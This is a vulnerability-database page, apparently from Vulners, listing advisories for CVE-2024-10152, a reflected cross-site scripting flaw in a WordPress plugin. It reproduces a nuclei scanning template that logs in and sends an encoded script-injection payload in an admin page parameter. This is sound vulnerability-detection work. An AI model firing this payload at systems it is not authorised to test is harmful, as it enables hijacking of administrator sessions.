Lucene search
K

Simple Certain Time to Show Content - Cross-Site Scripting

🗓️ 22 Jun 2026 05:20:07Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 8 Views

Reflected cross-site scripting in WordPress plugin Simple Certain Time to Show Content below 1.3.1.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-10152
26 Feb 202506:25
circl
CNNVD
WordPress plugin Simple Certain Time to Show Content 安全漏洞
26 Feb 202500:00
cnnvd
CVE
CVE-2024-10152
26 Feb 202506:00
cve
Cvelist
CVE-2024-10152 Simple Certain Time to Show Content < 1.3.1 - Reflected XSS
26 Feb 202506:00
cvelist
EUVD
EUVD-2025-5303
3 Oct 202520:07
euvd
NVD
CVE-2024-10152
26 Feb 202513:15
nvd
OSV
CVE-2024-10152
26 Feb 202513:15
osv
Patchstack
WordPress Simple Certain Time to Show Content plugin <= 1.2.2 - Reflected Cross-Site Scripting vulnerability
12 Feb 202522:22
patchstack
Positive Technologies
PT-2025-8668
26 Feb 202500:00
ptsecurity
RedhatCVE
CVE-2024-10152
28 Feb 202506:27
redhatcve
Rows per page
id: CVE-2024-10152

info:
  name: Simple Certain Time to Show Content - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: high
  description: |
    Simple Certain Time to Show Content WordPress plugin < 1.3.1 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute arbitrary scripts in the context of high privilege users such as admin, exploit requires attacker to craft a malicious URL.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to session hijacking or privilege escalation.
  remediation: |
    Update to version 1.3.1 or later.
  reference:
    - https://wpscan.com/vulnerability/b4d17da2-4c47-4fd1-a6bd-6692b07cf710/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-10152
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 7.1
    cve-id: CVE-2024-10152
    cwe-id: CWE-79
    epss-score: 0.00605
    epss-percentile: 0.44258
    cpe: cpe:2.3:a:elementengage:simple_certain_time_to_show_content:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: elementengage
    product: simple_certain_time_to_show_content
  tags: cve,cve2024,elementengage,simple-certain-time-to-show-content,wordpress,wp,wp-plugin,authenticated,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "wordpress_logged_in")'
          - 'status_code == 302'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=simple-certain-time-to-show-content&tab=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "><script>alert(document.domain)</script>","simple-certain-time-to-show-content")'
        condition: and
# digest: 4b0a00483046022100a404d29557d51ec7e7004059768e64cdce80d51995594e4063b23b52ae0bb2b9022100854c8178a7adb3f3d2dfd9dceabfd9c3eb2c72da7a6866c95b764b24628bd929:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Feb 2026 14:55Current
7.4High risk
Vulners AI Score7.4
CVSS 3.17.1
EPSS0.00605
SSVC
8